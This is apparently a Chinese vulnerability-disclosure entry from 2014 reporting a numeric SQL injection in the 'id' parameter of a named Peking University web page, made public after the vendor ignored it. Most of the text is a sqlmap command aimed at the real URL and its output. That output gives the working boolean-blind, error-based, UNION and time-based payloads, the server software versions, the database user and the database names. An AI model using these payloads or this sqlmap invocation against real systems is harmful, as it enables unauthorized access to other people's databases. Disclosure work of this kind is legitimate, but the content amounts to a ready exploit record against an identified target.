2014-11-24: 细节已通知厂商并且等待厂商处理中 2014-11-29: 厂商已经主动忽略漏洞,细节向公众公开
数字型注射
sqlmap.py -u http://www.metc.pku.edu.cn/dd.php?id=368 --dbs --current-user -v 0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=368 AND 8836=8836 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=368 AND (SELECT 4479 FROM(SELECT COUNT(*),CONCAT(0x3a6866673a,(SELECT (CASE WHEN (4479=4479) THEN 1 ELSE 0 END)),0x3a6e7a613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 23 columns Payload: id=368 LIMIT 0,1 UNION ALL SELECT NULL,NULL,CONCAT(0x3a6866673a,0x68544677625346704179,0x3a6e7a613a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=368 AND SLEEP(5)---web server operating system: Linux Ubuntuweb application technology: Apache, PHP 5.2.4back-end DBMS: MySQL 5.0current user: 'metc@localhost'available databases [2]:[*] information_schema[*] metcweb
同上
NULL
危害等级:无影响厂商忽略
忽略时间:2014-11-29 12:42
暂无